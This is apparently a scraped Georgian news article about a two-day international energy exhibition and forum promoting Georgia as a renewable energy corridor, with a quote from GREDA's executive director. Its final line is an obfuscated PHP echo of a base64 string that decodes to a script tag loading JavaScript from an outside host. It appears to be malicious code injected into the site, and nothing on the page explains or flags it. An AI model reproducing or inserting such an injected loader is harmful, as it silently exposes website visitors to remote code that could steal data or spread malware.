celsiusi
ავერსი საქკაბელი

 საქართველო საერთაშორისო ენერგეტიკულ გამოფენასა და ფორუმს მასპინძლობს, რომლის მთავარ თემას საქართველოს, როგორც განახლებადი ენერგიის დერეფნის გადამწყვეტი როლის წარმოჩენა წარმოადგენს.

ღონისძიება საქართველოს განახლებადი ენერგიის განვითარების ასოციაციის (GREDA), Invest in Network-ისა და Expo Georgia-ს ორგანიზებით ექსპო ჯორჯიაში იმართება.

ფორუმს ესწრებიან ენერგეტიკული სექტორის წარმომადგენლები, განახლებადი ენერგიის დეველოპერები, სამთავრობო სექტორი, ფინანსური ორგანიზაციები როგორც საქართველოდან, ასევე მთელი მსოფლიოდან. ფორუმის პარალელურად იმართება გამოფენა, სადაც წარმოდგენილია სხვადასხვა საერთაშორისო ბრენდი, სექტორის უახლესი მიღწევები და ინოვაციები.

ღონისძიება ორი დღის განმავლობაში გაგრძელდება. გაიმართება სესიები, რომლის ფარგლებშიც გაიმართება დისკუსიები ელექტროენერგიის მართვის სისტემებზე, განახლებადი ენერგიის წყაროების მხარდაჭერის მექანიზმებზე, ელექტროენერგიის ბაზრის ლიბერალიზაციასა და საქართველოს, როგორც მწვანე ენერგიის რეგიონული ჰაბის პერსპექტივებზე.

„საქართველოს ენერგეტიკის გამოფენა და ფორუმი წარმოადგენს ერთგვარ მოქნილ პლატფორმას ყველა დაინტერესებული მხარისთვის როგორც ადგილობრივ, ისე საერთაშორისო დონეზე. ენერგეტიკის ორდღიანი ფორუმი ემსახურებოდა მიზანს, საქართველოს განახლებადი ენერგიის უზარმაზარი პოტენციალი წარგვედგინა საერთაშორისო პარტნიორებისა და ინვესტორებისთვის, გამოცდილებისა და იმ სტრატეგიების გაზიარებისთვის შეგვეწყო ხელი, რომლებიც გადამწყვეტია ჩვენი ქვეყნის ენერგეტიკული დღის წესრიგის წინსვლისთვის“, – განაცხადა GREDA-ს აღმასრულებელმა დირექტორმა, მაია მელიქიძემ.

114
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");